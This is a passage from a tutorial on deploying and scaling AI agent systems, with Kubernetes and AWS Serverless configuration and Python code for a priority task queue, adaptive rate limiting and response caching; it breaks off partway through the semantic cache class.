            # list, so the passwords must be declared before the URLs.
            - name: POSTGRES_PASSWORD
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: POSTGRES_PASSWORD
            - name: REDIS_PASSWORD
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: REDIS_PASSWORD
            - name: DATABASE_URL
              value: "postgresql://postgres:$(POSTGRES_PASSWORD)@postgres:5432/agent_db"
            - name: REDIS_URL
              value: "redis://:$(REDIS_PASSWORD)@redis:6379/0"
            - name: WORKER_CONCURRENCY
              value: "4"
          envFrom:
            - configMapRef:
                name: agent-config
          volumeMounts:
            - name: agent-data
              mountPath: /data
      volumes:
        - name: agent-data
          persistentVolumeClaim:
            claimName: agent-data-pvc

Horizontal Pod Autoscaler for dynamic scaling:

yaml
# agent-api-hpa.yaml
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: agent-api-hpa
  namespace: ai-agents
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: agent-api
  minReplicas: 3
  maxReplicas: 10
  metrics:
    - type: Resource
      resource:
        name: cpu
        target:
          type: Utilization
          averageUtilization: 70
    - type: Resource
      resource:
        name: memory
        target:
          type: Utilization
          averageUtilization: 80
  behavior:
    scaleUp:
      stabilizationWindowSeconds: 60
      policies:
        - type: Percent
          value: 100
          periodSeconds: 60
    scaleDown:
      stabilizationWindowSeconds: 300
      policies:
        - type: Percent
          value: 10
          periodSeconds: 120
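
To see how the utilization targets above translate into replica counts, here is a rough sketch of the core calculation documented for the Horizontal Pod Autoscaler: `ceil(currentReplicas * currentMetric / targetMetric)`, evaluated per metric, with the largest result winning. The function names are illustrative, the 0.1 tolerance is the documented controller default, and the sketch deliberately ignores the `behavior` policies and stabilization windows.

```python
import math
from typing import Iterable, Tuple


def desired_replicas(current_replicas: int,
                     current_utilization: float,
                     target_utilization: float,
                     min_replicas: int = 3,
                     max_replicas: int = 10,
                     tolerance: float = 0.1) -> int:
    """Replica count suggested by a single utilization metric."""
    ratio = current_utilization / target_utilization
    # Within the tolerance band the controller leaves the count unchanged.
    if abs(ratio - 1.0) <= tolerance:
        return current_replicas
    desired = math.ceil(current_replicas * ratio)
    return max(min_replicas, min(max_replicas, desired))


def replicas_for_metrics(current_replicas: int,
                         metrics: Iterable[Tuple[float, float]]) -> int:
    """With several metrics, the largest proposed count is used."""
    return max(desired_replicas(current_replicas, current, target)
               for current, target in metrics)


# CPU at 90% against a 70% target, memory at 50% against an 80% target.
print(replicas_for_metrics(3, [(90, 70), (50, 80)]))
```

Because the largest proposal wins, a memory target on a service whose memory footprint does not shrink under low load can keep the Deployment pinned above `minReplicas`.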

Ingress for external access:

yaml
# agent-ingress.yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: agent-ingress
  namespace: ai-agents
  annotations:
    cert-manager.io/cluster-issuer: letsencrypt-prod
    nginx.ingress.kubernetes.io/proxy-body-size: "10m"
    nginx.ingress.kubernetes.io/proxy-read-timeout: "600"
    nginx.ingress.kubernetes.io/proxy-send-timeout: "600"
spec:
  # Replaces the deprecated kubernetes.io/ingress.class annotation
  ingressClassName: nginx
  tls:
    - hosts:
        - api.example.com
      secretName: agent-api-tls
  rules:
    - host: api.example.com
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: agent-api
                port:
                  number: 80

Cloud Hosting Options

For serverless deployment on AWS, create a serverless.yml configuration:

yaml
service: ai-agent-system

frameworkVersion: '3'

provider:
  name: aws
  runtime: python3.9
  stage: ${opt:stage, 'dev'}
  region: ${opt:region, 'us-west-2'}
  memorySize: 1024
  timeout: 30
  environment:
    # Serverless Framework v3 decrypts SecureString parameters automatically;
    # the v2-era "~true" suffix is no longer supported.
    OPENAI_API_KEY: ${ssm:/ai-agent/${self:provider.stage}/OPENAI_API_KEY}
    PINECONE_API_KEY: ${ssm:/ai-agent/${self:provider.stage}/PINECONE_API_KEY}
    PINECONE_ENVIRONMENT: ${ssm:/ai-agent/${self:provider.stage}/PINECONE_ENVIRONMENT}
    LOG_LEVEL: INFO
    STAGE: ${self:provider.stage}
  iam:
    role:
      statements:
        - Effect: Allow
          Action:
            - s3:GetObject
            - s3:PutObject
          Resource:
            - "arn:aws:s3:::ai-agent-${self:provider.stage}/*"
        - Effect: Allow
          Action:
            - sqs:SendMessage
            - sqs:ReceiveMessage
            - sqs:DeleteMessage
            - sqs:GetQueueAttributes
          Resource:
            - "arn:aws:sqs:${self:provider.region}:*:ai-agent-tasks-${self:provider.stage}"
        - Effect: Allow
          Action:
            - dynamodb:GetItem
            - dynamodb:PutItem
            - dynamodb:UpdateItem
            - dynamodb:DeleteItem
            - dynamodb:Query
            - dynamodb:Scan
          Resource:
            - "arn:aws:dynamodb:${self:provider.region}:*:table/ai-agent-${self:provider.stage}"

functions:
  api:
    handler: app.handlers.api_handler
    events:
      - httpApi:
          path: /api/{proxy+}
          method: any
    environment:
      FUNCTION_TYPE: API
    memorySize: 1024
    timeout: 30

  agent-executor:
    handler: app.handlers.agent_executor
    events:
      - sqs:
          arn:
            Fn::GetAtt:
              - AgentTasksQueue
              - Arn
          batchSize: 1
          maximumBatchingWindow: 10
    environment:
      FUNCTION_TYPE: WORKER
    memorySize: 2048
    timeout: 900 # 15 minutes for long-running tasks
    reservedConcurrency: 50 # Limit concurrent executions

  scheduler:
    handler: app.handlers.scheduler_handler
    events:
      - schedule: rate(5 minutes)
    environment:
      FUNCTION_TYPE: SCHEDULER
    timeout: 60

resources:
  Resources:
    AgentTasksQueue:
      Type: AWS::SQS::Queue
      Properties:
        QueueName: ai-agent-tasks-${self:provider.stage}
        # Must be at least the consumer's timeout (900s); AWS recommends
        # a larger margin so retries do not overlap in-flight work.
        VisibilityTimeout: 900
        MessageRetentionPeriod: 86400

    AgentTasksTable:
      Type: AWS::DynamoDB::Table
      Properties:
        TableName: ai-agent-${self:provider.stage}
        BillingMode: PAY_PER_REQUEST
        AttributeDefinitions:
          - AttributeName: id
            AttributeType: S
          - AttributeName: user_id
            AttributeType: S
          - AttributeName: status
            AttributeType: S
          - AttributeName: created_at
            AttributeType: S
        KeySchema:
          - AttributeName: id
            KeyType: HASH
        GlobalSecondaryIndexes:
          - IndexName: UserIndex
            KeySchema:
              - AttributeName: user_id
                KeyType: HASH
              - AttributeName: created_at
                KeyType: RANGE
            Projection:
              ProjectionType: ALL
          - IndexName: StatusIndex
            KeySchema:
              - AttributeName: status
                KeyType: HASH
              - AttributeName: created_at
                KeyType: RANGE
            Projection:
              ProjectionType: ALL

    AgentDataBucket:
      Type: AWS::S3::Bucket
      Properties:
        # S3 bucket names are globally unique; adjust the prefix as needed
        BucketName: ai-agent-${self:provider.stage}
        VersioningConfiguration:
          Status: Enabled
        LifecycleConfiguration:
          Rules:
            - Id: ExpireOldVersions
              Status: Enabled
              NoncurrentVersionExpiration:
                NoncurrentDays: 30
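
The configuration above points the `agent-executor` function at `app.handlers.agent_executor` but does not show the handler. As a minimal sketch, assuming each SQS message body is a JSON task description, the handler could look like the following; `run_agent_task` is a hypothetical placeholder for the real agent call.

```python
import json
from typing import Any, Dict, List


def run_agent_task(task: Dict[str, Any]) -> Dict[str, Any]:
    """Hypothetical stand-in for the real agent invocation."""
    return {"task_id": task.get("task_id"), "status": "executed"}


def agent_executor(event: Dict[str, Any], context: Any) -> Dict[str, Any]:
    """Process every SQS record delivered in this Lambda invocation."""
    results: List[Dict[str, Any]] = []
    for record in event.get("Records", []):
        # The SQS event source delivers the message payload as a string.
        task = json.loads(record["body"])
        # An uncaught exception here fails the invocation, so the message
        # becomes visible again after the queue's visibility timeout.
        results.append(run_agent_task(task))
    return {"processed": len(results), "results": results}


# Local smoke test with a hand-built event shaped like an SQS delivery.
sample_event = {
    "Records": [{"messageId": "1", "body": json.dumps({"task_id": "t-1"})}]
}
print(agent_executor(sample_event, None))
```

With `batchSize: 1`, each invocation handles a single message, which keeps retries isolated to the task that failed.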

6. Optimizing and Scaling AI Agents for Enterprise Use

Best Practices for Efficient AI Task Orchestration

Efficient orchestration of AI agent tasks is critical for building scalable enterprise systems. Here are key best practices:

1. Implement Task Prioritization and Queuing

python
# task_orchestration/priority_queue.py
import heapq
import time
import threading
import uuid
from typing import Dict, List, Any, Optional, Callable
from dataclasses import dataclass, field

@dataclass(order=True)
class PrioritizedTask:
    """A task with priority for the queue."""
    priority: int
    created_at: float = field(default_factory=time.time)
    task_id: str = field(default_factory=lambda: str(uuid.uuid4()))
    task_type: str = field(default="", compare=False)
    payload: Dict[str, Any] = field(default_factory=dict, compare=False)
    callback: Optional[Callable] = field(default=None, compare=False)

    # Ordering comes from the compared fields in declaration order:
    # lower priority number first, then earlier created_at (older tasks
    # first within a priority level), then task_id as a final tie-breaker.
    # Keeping priority a plain int lets update_priority() reassign it safely.

class PriorityTaskQueue:
    """Thread-safe priority queue for AI agent tasks."""

    PRIORITY_HIGH = 1
    PRIORITY_MEDIUM = 2
    PRIORITY_LOW = 3

    def __init__(self):
        self._queue = []
        self._lock = threading.RLock()
        self._task_map = {}  # Maps task_id to its task for O(1) lookups by ID

    def push(self, task: PrioritizedTask) -> str:
        """Add a task to the queue with proper priority."""
        with self._lock:
            heapq.heappush(self._queue, task)
            self._task_map[task.task_id] = task
            return task.task_id

    def pop(self) -> Optional[PrioritizedTask]:
        """Get the highest priority task from the queue."""
        with self._lock:
            if not self._queue:
                return None
            task = heapq.heappop(self._queue)
            if task.task_id in self._task_map:
                del self._task_map[task.task_id]
            return task

    def peek(self) -> Optional[PrioritizedTask]:
        """View the highest priority task without removing it."""
        with self._lock:
            if not self._queue:
                return None
            return self._queue[0]

    def remove(self, task_id: str) -> bool:
        """Remove a specific task by ID."""
        with self._lock:
            if task_id not in self._task_map:
                return False

            # Note: removal from a heap is O(n); _task_map only speeds up the
            # membership check. In a production system with frequent removals,
            # consider a different data structure.
            self._queue = [task for task in self._queue if task.task_id != task_id]
            heapq.heapify(self._queue)
            del self._task_map[task_id]
            return True

    def get_task(self, task_id: str) -> Optional[PrioritizedTask]:
        """Get a task by ID without removing it."""
        with self._lock:
            return self._task_map.get(task_id)

    def size(self) -> int:
        """Get the number of tasks in the queue."""
        with self._lock:
            return len(self._queue)

    def update_priority(self, task_id: str, new_priority: int) -> bool:
        """Update the priority of a task."""
        with self._lock:
            if task_id not in self._task_map:
                return False

            # Remove and re-add with new priority
            task = self._task_map[task_id]
            self.remove(task_id)
            task.priority = new_priority
            self.push(task)
            return True

# Example orchestrator that uses the priority queue
class AgentTaskOrchestrator:
    """Orchestrates tasks across multiple AI agents with priority queuing."""

    def __init__(self, max_workers=10):
        self.task_queue = PriorityTaskQueue()
        self.results = {}
        self.max_workers = max_workers
        self.running_tasks = set()
        self.workers = []
        self.stop_event = threading.Event()

    def start(self):
        """Start the orchestrator with worker threads."""
        self.stop_event.clear()

        # Create worker threads
        for i in range(self.max_workers):
            worker = threading.Thread(target=self._worker_loop, args=(i,))
            worker.daemon = True
            worker.start()
            self.workers.append(worker)

    def stop(self):
        """Stop the orchestrator and all workers."""
        self.stop_event.set()
        for worker in self.workers:
            worker.join(timeout=1.0)
        self.workers = []

    def schedule_task(self, task_type: str, payload: Dict[str, Any],
                      priority: int = PriorityTaskQueue.PRIORITY_MEDIUM) -> str:
        """Schedule a task for execution."""
        task = PrioritizedTask(
            priority=priority,
            task_type=task_type,
            payload=payload
        )
        task_id = self.task_queue.push(task)
        return task_id

    def get_result(self, task_id: str) -> Dict[str, Any]:
        """Get the result of a task if available."""
        return self.results.get(task_id, {"status": "unknown"})

    def _worker_loop(self, worker_id: int):
        """Worker thread that processes tasks from the queue."""
        while not self.stop_event.is_set():
            task = self.task_queue.pop()

            if not task:
                time.sleep(0.1)
                continue

            try:
                self.running_tasks.add(task.task_id)
                self.results[task.task_id] = {"status": "running"}

                # Route task to appropriate handler based on task_type
                if task.task_type == "agent_execution":
                    result = self._execute_agent_task(task.payload)
                elif task.task_type == "agent_conversation":
                    result = self._process_conversation(task.payload)
                elif task.task_type == "data_processing":
                    result = self._process_data(task.payload)
                else:
                    # Record unknown types as failures, not completed tasks
                    raise ValueError(f"Unknown task type: {task.task_type}")

                # Store the result
                self.results[task.task_id] = {
                    "status": "completed",
                    "result": result,
                    "completed_at": time.time()
                }

                # Execute callback if provided
                if task.callback:
                    task.callback(task.task_id, result)

            except Exception as e:
                # Handle task execution errors
                self.results[task.task_id] = {
                    "status": "failed",
                    "error": str(e),
                    "completed_at": time.time()
                }
            finally:
                self.running_tasks.discard(task.task_id)

    def _execute_agent_task(self, payload: Dict[str, Any]) -> Dict[str, Any]:
        """Execute an AI agent task."""
        # Implementation would depend on the specific agent framework
        agent_type = payload.get("agent_type")
        parameters = payload.get("parameters", {})

        # This would call your actual agent implementation
        # For example:
        # from agent_framework import get_agent
        # agent = get_agent(agent_type)
        # return agent.execute(parameters)

        # Placeholder implementation
        time.sleep(2)  # Simulate work
        return {
            "agent_type": agent_type,
            "status": "executed",
            "payload": parameters
        }

    def _process_conversation(self, payload: Dict[str, Any]) -> Dict[str, Any]:
        """Process a conversation message with an AI agent."""
        # Implementation for conversation processing
        # Placeholder implementation
        time.sleep(1)  # Simulate work
        return {
            "message_processed": True,
            "response": "This is a simulated agent response"
        }

    def _process_data(self, payload: Dict[str, Any]) -> Dict[str, Any]:
        """Process data with an AI agent."""
        # Implementation for data processing
        # Placeholder implementation
        time.sleep(3)  # Simulate work
        return {
            "data_processed": True,
            "records_processed": 42
        }
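
The ordering rule behind the queue above (lower priority number first, first-in-first-out within a level) can be checked in isolation. This standalone sketch uses a hypothetical `QueuedTask` with an insertion counter as the tie-breaker instead of a timestamp, which keeps the result deterministic.

```python
import heapq
import itertools
from dataclasses import dataclass, field
from typing import Any, Dict, List

_sequence = itertools.count()  # Monotonic counter used as a FIFO tie-breaker


@dataclass(order=True)
class QueuedTask:
    priority: int
    sequence: int = field(default_factory=lambda: next(_sequence))
    payload: Dict[str, Any] = field(default_factory=dict, compare=False)


heap: List[QueuedTask] = []
heapq.heappush(heap, QueuedTask(priority=3, payload={"name": "nightly-report"}))
heapq.heappush(heap, QueuedTask(priority=1, payload={"name": "user-chat"}))
heapq.heappush(heap, QueuedTask(priority=1, payload={"name": "user-chat-2"}))
heapq.heappush(heap, QueuedTask(priority=2, payload={"name": "reindex"}))

# Drain the heap: tasks come out by priority, then by insertion order.
order = [heapq.heappop(heap).payload["name"] for _ in range(len(heap))]
print(order)
# ['user-chat', 'user-chat-2', 'reindex', 'nightly-report']
```

A counter avoids ties between tasks created within the same clock tick, which a timestamp alone cannot rule out.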

2. Implement Rate Limiting and Adaptive Concurrency

python
# task_orchestration/rate_limiter.py
import time
import threading
import logging
from typing import Dict, List, Any, Optional, Callable
from dataclasses import dataclass

logger = logging.getLogger(__name__)

@dataclass
class RateLimitRule:
    """Rule for rate limiting."""
    calls_per_minute: int
    max_burst: int
    scope: str  # 'global', 'model', 'api_key', etc.

class TokenBucket:
    """Token bucket algorithm implementation for rate limiting."""

    def __init__(self, rate: float, max_tokens: float):
        """
        Initialize a token bucket.

        Args:
            rate: Tokens per second
            max_tokens: Maximum tokens the bucket can hold
        """
        self.rate = rate
        self.max_tokens = max_tokens
        self.tokens = max_tokens
        self.last_refill = time.time()
        self.lock = threading.RLock()

    def _refill(self):
        """Refill the bucket based on elapsed time."""
        # Read the clock and update state under the lock so two threads
        # cannot both credit the same elapsed interval.
        with self.lock:
            now = time.time()
            elapsed = now - self.last_refill
            self.tokens = min(self.max_tokens, self.tokens + elapsed * self.rate)
            self.last_refill = now

    def consume(self, tokens: int = 1) -> bool:
        """
        Consume tokens from the bucket.

        Args:
            tokens: Number of tokens to consume

        Returns:
            True if tokens were consumed, False if not enough tokens
        """
        with self.lock:
            self._refill()
            if tokens <= self.tokens:
                self.tokens -= tokens
                return True
            return False

    def wait_for_tokens(self, tokens: int = 1, timeout: Optional[float] = None) -> bool:
        """
        Wait until the requested tokens are available.

        Args:
            tokens: Number of tokens to consume
            timeout: Maximum time to wait in seconds

        Returns:
            True if tokens were consumed, False if timeout occurred
        """
        deadline = time.time() + timeout if timeout is not None else None

        while True:
            if self.consume(tokens):
                return True

            if deadline is not None and time.time() >= deadline:
                return False

            # Wait for some time before retrying
            sleep_time = max(0.01, tokens / self.rate)
            time.sleep(min(sleep_time, 0.1))

class AdaptiveRateLimiter:
    """
    Rate limiter with adaptive concurrency based on response times and error rates.
    Dynamically adjusts concurrency levels for optimal throughput.
    """

    def __init__(self,
                 initial_rate: float = 10.0,
                 initial_concurrency: int = 5,
                 min_concurrency: int = 1,
                 max_concurrency: int = 50,
                 target_success_rate: float = 0.95,
                 target_latency: float = 1.0):
        """
        Initialize the adaptive rate limiter.

        Args:
            initial_rate: Initial rate limit (requests per second)
            initial_concurrency: Initial concurrency level
            min_concurrency: Minimum concurrency level
            max_concurrency: Maximum concurrency level
            target_success_rate: Target success rate (0-1)
            target_latency: Target latency in seconds
        """
        self.bucket = TokenBucket(initial_rate, initial_rate * 2)  # Allow 2 seconds of burst
        self.concurrency = initial_concurrency
        self.min_concurrency = min_concurrency
        self.max_concurrency = max_concurrency
        self.target_success_rate = target_success_rate
        self.target_latency = target_latency

        # Stats tracking (guarded by _stats_lock; updated from many threads)
        self._stats_lock = threading.Lock()
        self.success_count = 0
        self.error_count = 0
        self.latencies = []
        self.latency_window = 100  # Keep last 100 latencies

        # Semaphore for concurrency control
        self.semaphore = threading.Semaphore(initial_concurrency)

        # Adaptive adjustment
        self.adjustment_thread = threading.Thread(target=self._adjustment_loop, daemon=True)
        self.adjustment_thread.start()

    def execute(self, func: Callable, *args, **kwargs) -> Any:
        """
        Execute a function with rate limiting and concurrency control.

        Args:
            func: Function to execute
            *args, **kwargs: Arguments to pass to the function

        Returns:
            Result of the function
        """
        # Wait for token from the bucket
        if not self.bucket.wait_for_tokens(1, timeout=30):
            raise RuntimeError("Rate limit exceeded - no tokens available")

        # Keep a reference to the semaphore we acquire: _update_limits may
        # swap self.semaphore while this call is in flight, and the permit
        # must go back to the object it was taken from.
        semaphore = self.semaphore
        acquired = semaphore.acquire(timeout=30)
        if not acquired:
            raise RuntimeError("Concurrency limit exceeded - no slot available")

        start_time = time.time()
        success = False

        try:
            result = func(*args, **kwargs)
            success = True
            return result
        finally:
            execution_time = time.time() - start_time
            semaphore.release()

            # Update stats
            with self._stats_lock:
                if success:
                    self.success_count += 1
                else:
                    self.error_count += 1

                self.latencies.append(execution_time)
                if len(self.latencies) > self.latency_window:
                    self.latencies.pop(0)

    def get_current_limits(self) -> Dict[str, Any]:
        """Get current rate limits and stats."""
        with self._stats_lock:
            total = self.success_count + self.error_count
            success_rate = self.success_count / max(1, total)
            avg_latency = sum(self.latencies) / max(1, len(self.latencies))

        return {
            "rate_limit": self.bucket.rate,
            "concurrency": self.concurrency,
            "success_rate": success_rate,
            "average_latency": avg_latency,
            "requests_processed": total
        }

    def _adjustment_loop(self):
        """Background thread that adjusts rate limits based on performance."""
        while True:
            time.sleep(10)  # Adjust every 10 seconds

            with self._stats_lock:
                total = self.success_count + self.error_count
                if total < 10:
                    # Not enough data to make adjustments
                    continue

                # Calculate metrics
                success_rate = self.success_count / total
                avg_latency = sum(self.latencies) / max(1, len(self.latencies))

                # Reset counters
                self.success_count = 0
                self.error_count = 0

            # Adjust based on success rate and latency
            if success_rate < self.target_success_rate:
                # Too many errors, reduce concurrency and rate
                new_concurrency = max(self.min_concurrency, int(self.concurrency * 0.8))
                new_rate = max(1.0, self.bucket.rate * 0.8)

                logger.info(f"Reducing limits due to errors: concurrency {self.concurrency} -> {new_concurrency}, "
                            f"rate {self.bucket.rate:.1f} -> {new_rate:.1f} (success rate: {success_rate:.2f})")

                self._update_limits(new_concurrency, new_rate)

            elif avg_latency > self.target_latency * 1.5:
                # Latency too high, reduce concurrency slightly
                new_concurrency = max(self.min_concurrency, int(self.concurrency * 0.9))

                logger.info(f"Reducing concurrency due to high latency: {self.concurrency} -> {new_concurrency} "
                            f"(latency: {avg_latency:.2f}s)")

                self._update_limits(new_concurrency, self.bucket.rate)

            elif success_rate > 0.98 and avg_latency < self.target_latency * 0.8:
                # Everything looks good, try increasing concurrency and rate
                new_concurrency = min(self.max_concurrency, int(self.concurrency * 1.1) + 1)
                new_rate = min(100.0, self.bucket.rate * 1.1)

                logger.info(f"Increasing limits: concurrency {self.concurrency} -> {new_concurrency}, "
                            f"rate {self.bucket.rate:.1f} -> {new_rate:.1f} (success rate: {success_rate:.2f}, "
                            f"latency: {avg_latency:.2f}s)")

                self._update_limits(new_concurrency, new_rate)

    def _update_limits(self, new_concurrency: int, new_rate: float):
        """Update concurrency and rate limits."""
        # Update concurrency
        if new_concurrency > self.concurrency:
            # Add permits to the semaphore
            for _ in range(new_concurrency - self.concurrency):
                self.semaphore.release()
        elif new_concurrency < self.concurrency:
            # Cannot directly reduce semaphore count.
            # Create a new semaphore and use it going forward; calls already
            # in flight still hold permits on the old one, so the effective
            # concurrency can briefly exceed the new limit.
            self.semaphore = threading.Semaphore(new_concurrency)

        self.concurrency = new_concurrency

        # Update rate limit
        self.bucket = TokenBucket(new_rate, new_rate * 2)  # Allow 2 seconds of burst

class ModelBasedRateLimiter:
    """Rate limiter that tracks limits separately for different LLM models."""

    def __init__(self):
        """Initialize with default rate limits for different models."""
        self.limiters = {
            # Format: model_name: AdaptiveRateLimiter(initial_rate, initial_concurrency)
            # Note: initial_rate is in requests per SECOND (see AdaptiveRateLimiter),
            # not per minute. Tune these to your provider's actual quota.
            "gpt-4-turbo": AdaptiveRateLimiter(initial_rate=6.0, initial_concurrency=3),  # 6 req/s
            "gpt-3.5-turbo": AdaptiveRateLimiter(initial_rate=50.0, initial_concurrency=10),  # 50 req/s
            "text-embedding-ada-002": AdaptiveRateLimiter(initial_rate=100.0, initial_concurrency=20),  # 100 req/s
            "default": AdaptiveRateLimiter(initial_rate=10.0, initial_concurrency=5)  # Default fallback
        }

    def execute(self, model: str, func: Callable, *args, **kwargs) -> Any:
        """
        Execute a function with rate limiting based on model.

        Args:
            model: Model name
            func: Function to execute
            *args, **kwargs: Arguments to pass to the function

        Returns:
            Result of the function
        """
        limiter = self.limiters.get(model, self.limiters["default"])
        return limiter.execute(func, *args, **kwargs)

    def get_limits(self, model: Optional[str] = None) -> Dict[str, Any]:
        """
        Get current rate limits for a model or all models.

        Args:
            model: Optional model name

        Returns:
            Dictionary with rate limit information
        """
        if model:
            limiter = self.limiters.get(model, self.limiters["default"])
            return {model: limiter.get_current_limits()}

        return {model: limiter.get_current_limits() for model, limiter in self.limiters.items()}
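
The token bucket behaviour that the limiter above relies on is easier to reason about with a controllable clock. This is a minimal single-threaded sketch; `SimpleTokenBucket` and `FakeClock` are illustrative names introduced here, not part of the module above.

```python
from typing import Callable


class FakeClock:
    """Manually advanced clock so the example is deterministic."""

    def __init__(self) -> None:
        self.now = 0.0

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


class SimpleTokenBucket:
    """Single-threaded token bucket: `rate` tokens/second up to `capacity`."""

    def __init__(self, rate: float, capacity: float, clock: Callable[[], float]):
        self.rate = rate
        self.capacity = capacity
        self.tokens = float(capacity)  # Start full, allowing an initial burst
        self.clock = clock
        self.last_refill = clock()

    def try_consume(self, tokens: float = 1.0) -> bool:
        # Credit tokens for the time elapsed since the last call, capped
        # at capacity, then spend them if enough are available.
        now = self.clock()
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last_refill) * self.rate)
        self.last_refill = now
        if tokens <= self.tokens:
            self.tokens -= tokens
            return True
        return False


clock = FakeClock()
bucket = SimpleTokenBucket(rate=2.0, capacity=2.0, clock=clock)

burst = [bucket.try_consume() for _ in range(3)]  # Third call finds it empty
clock.advance(0.5)                                # 0.5 s at 2 tokens/s = 1 token
after_wait = [bucket.try_consume() for _ in range(2)]
print(burst, after_wait)
# [True, True, False] [True, False]
```

The capacity bounds the burst size while the rate bounds sustained throughput, which is why the limiter above sizes its bucket at twice the per-second rate.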

3. Implement Smart Caching and Result Reuse

python
# task_orchestration/smart_cache.py
import hashlib
import json
import time
import threading
import logging
from typing import Dict, Any, Optional, Callable, Tuple, List, Union
from dataclasses import dataclass

logger = logging.getLogger(__name__)

@dataclass
class CacheEntry:
    """An entry in the cache."""
    value: Any
    created_at: float
    expires_at: Optional[float]
    cost: float = 0.0  # For cost-based accounting (e.g., token count, API cost)

class SmartCache:
    """
    Smart caching system with TTL, cost-awareness, and partial matching capabilities.
    """

    def __init__(self,
                 max_size: int = 1000,
                 default_ttl: int = 3600,
                 semantic_cache_threshold: float = 0.92):
        """
        Initialize the smart cache.

        Args:
            max_size: Maximum number of items in the cache
            default_ttl: Default time-to-live in seconds
            semantic_cache_threshold: Threshold for semantic similarity matching
        """
        self.cache = {}
        self.max_size = max_size
        self.default_ttl = default_ttl
        self.semantic_cache_threshold = semantic_cache_threshold
        self.lock = threading.RLock()
        self.metrics = {
            "hits": 0,
            "misses": 0,
            "semantic_hits": 0,
            "evictions": 0,
            "total_cost_saved": 0.0
        }

        # Start cleanup thread
        self.cleanup_thread = threading.Thread(target=self._cleanup_loop, daemon=True)
        self.cleanup_thread.start()

    def _hash_key(self, key: Any) -> str:
        """
        Create a hash from any key object.

        Args:
            key: The key to hash (will be converted to JSON)

        Returns:
            Hashed key string
        """
        if isinstance(key, str):
            key_str = key
        else:
            # Convert objects to JSON for hashing
            key_str = json.dumps(key, sort_keys=True)

        # MD5 is used only as a fast cache-key digest, not for security
        return hashlib.md5(key_str.encode('utf-8')).hexdigest()

    def get(self, key: Any) -> Tuple[bool, Any]:
        """
        Get an item from the cache.

        Args:
            key: Cache key

        Returns:
            Tuple of (found, value)
        """
        hashed_key = self._hash_key(key)

        with self.lock:
            if hashed_key in self.cache:
                entry = self.cache[hashed_key]

                # Check if expired
                if entry.expires_at and time.time() > entry.expires_at:
                    del self.cache[hashed_key]
                    self.metrics["misses"] += 1
                    return False, None

                self.metrics["hits"] += 1
                self.metrics["total_cost_saved"] += entry.cost
                return True, entry.value

            self.metrics["misses"] += 1
            return False, None

    def set(self,
            key: Any,
            value: Any,
            ttl: Optional[int] = None,
            cost: float = 0.0) -> None:
        """
        Set an item in the cache.

        Args:
            key: Cache key
            value: Value to cache
            ttl: Time-to-live in seconds (None for default)
            cost: Cost metric associated with generating this value
        """
        ttl = ttl if ttl is not None else self.default_ttl
        hashed_key = self._hash_key(key)

        with self.lock:
            # Evict items if at max capacity
            if len(self.cache) >= self.max_size and hashed_key not in self.cache:
                self._evict_one()

            # A ttl of 0 means the entry never expires
            expires_at = time.time() + ttl if ttl else None

            self.cache[hashed_key] = CacheEntry(
                value=value,
                created_at=time.time(),
                expires_at=expires_at,
                cost=cost
            )

    def delete(self, key: Any) -> bool:
        """
        Delete an item from the cache.

        Args:
            key: Cache key

        Returns:
            True if item was deleted, False if not found
        """
        hashed_key = self._hash_key(key)

        with self.lock:
            if hashed_key in self.cache:
                del self.cache[hashed_key]
                return True
            return False

    def clear(self) -> None:
        """Clear all items from the cache."""
        with self.lock:
            self.cache.clear()

    def get_metrics(self) -> Dict[str, Any]:
        """Get cache metrics."""
        with self.lock:
            metrics = self.metrics.copy()
            metrics["size"] = len(self.cache)
            if metrics["hits"] + metrics["misses"] > 0:
                metrics["hit_ratio"] = metrics["hits"] / (metrics["hits"] + metrics["misses"])
            else:
                metrics["hit_ratio"] = 0
            return metrics

    def _evict_one(self) -> None:
        """Evict the oldest-inserted item (FIFO by created_at, not true LRU)."""
        if not self.cache:
            return

        # Find the oldest entry; reads do not refresh created_at, so recently
        # used entries are not protected from eviction.
        oldest_key = min(self.cache, key=lambda k: self.cache[k].created_at)
        del self.cache[oldest_key]
        self.metrics["evictions"] += 1

    def _cleanup_loop(self) -> None:
        """Background thread that cleans up expired entries."""
        while True:
            time.sleep(60)  # Check every minute
            self._cleanup_expired()

    def _cleanup_expired(self) -> None:
        """Remove all expired items from the cache."""
        now = time.time()

        with self.lock:
            expired_keys = [
                k for k, v in self.cache.items()
                if v.expires_at and now > v.expires_at
            ]

            for key in expired_keys:
                del self.cache[key]

class SemanticCache(SmartCache):
    """
    Cache that supports semantic similarity matching for AI responses.
    """

    def __init__(self,
                 embedding_func: Callable[[str], List[float]],
                 **kwargs):
        """
        Initialize the semantic cache.

        Args:
            embedding_func: Function that converts text to embeddings
            **kwargs: Arguments to pass to SmartCache
        """
        super().__init__(**kwargs)
        self.embedding_func = embedding_func
        self.embedding_cache = {}  # Maps hashed_key to embeddings

    def _compute_similarity(self, embedding1: List[float], embedding2: List[float]) -> float:
        """
        Compute cosine similarity between two embeddings.

        Args:
            embedding1: First embedding
            embedding2: Second embedding

        Returns:
            Cosine similarity in [-1, 1]; 0.0 if either vector has zero norm
        """
        import numpy as np

        # Convert to arrays and compute the vector norms
        embedding1 = np.array(embedding1)
        embedding2 = np.array(embedding2)

        norm1 = np.linalg.norm(embedding1)
        norm2 = np.linalg.norm(embedding2)

        if norm1 == 0 or norm2 == 0:
            return 0.0

        # Cast so callers receive a plain Python float rather than np.float64
        return float(np.dot(embedding1, embedding2) / (norm1 * norm2))

    def set(self,
            key: Any,
            value: Any,
            ttl: Optional[int] = None,
            cost: float = 0.0) -> None:
        """
        Set an item in the cache with semantic indexing.

        Args:
            key: Cache key
            value: Value to cache
            ttl: Time-to-live in seconds
            cost: Cost metric
        """
        super().set(key, value, ttl, cost)

        # Store embedding for semantic matching if key is a string
        if isinstance(key, str):
            try:
                hashed_key = self._hash_key(key)
                # Compute the embedding outside the lock; it may be a slow call
                embedding = self.embedding_func(key)
                # semantic_get iterates embedding_cache under the lock, so
                # writes must hold the lock as well
                with self.lock:
                    self.embedding_cache[hashed_key] = embedding
            except Exception as e:
